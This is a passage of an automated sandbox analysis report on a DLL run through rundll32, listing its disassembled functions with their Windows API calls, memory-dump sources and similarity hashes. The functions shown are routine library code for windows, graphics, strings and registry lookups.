                                                                                                                    • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                    • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                    • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                    • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                    • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                    • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                    • String ID: System
                                                                                                                    • API String ID: 46613423-3470857405
                                                                                                                    • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                    • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                    • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                    • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                    • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                    • _memset.LIBCMT ref: 10020AE2
                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1891723912-0
                                                                                                                    • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                    • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                    • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                    • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                      • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                      • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                    • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                    • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                    • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                    • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                    • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 317715441-0
                                                                                                                    • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                    • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                    • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                    • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                    • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                    • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                    • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                    • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                      • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                      • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                      • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 168474834-0
                                                                                                                    • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                    • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                    • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                    • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                    • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1151147025-0
                                                                                                                    • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                    • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                    • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                    • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                    • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2841959276-0
                                                                                                                    • Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                    • Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
                                                                                                                    • Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                    • Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                    • _memset.LIBCMT ref: 10029DA5
                                                                                                                      • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                      • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                      • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2905758408-0
                                                                                                                    • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                    • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                    • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                    • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3574576181-0
                                                                                                                    • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                    • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                    • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                    • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                    • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                    • String ID: Software\
                                                                                                                    • API String ID: 3878845136-964853688
                                                                                                                    • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                    • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                    • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                    • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 1001AC38
                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                    • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                    • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                    • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                    • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2853195852-0
                                                                                                                    • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                    • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                    • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                    • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3219385341-0
                                                                                                                    • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                    • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                    • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                    • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                    • GetParent.USER32(?), ref: 1002A22C
                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                    • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                    • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                    • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$LongParentVisible
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 506644340-0
                                                                                                                    • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                    • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                    • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                    • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

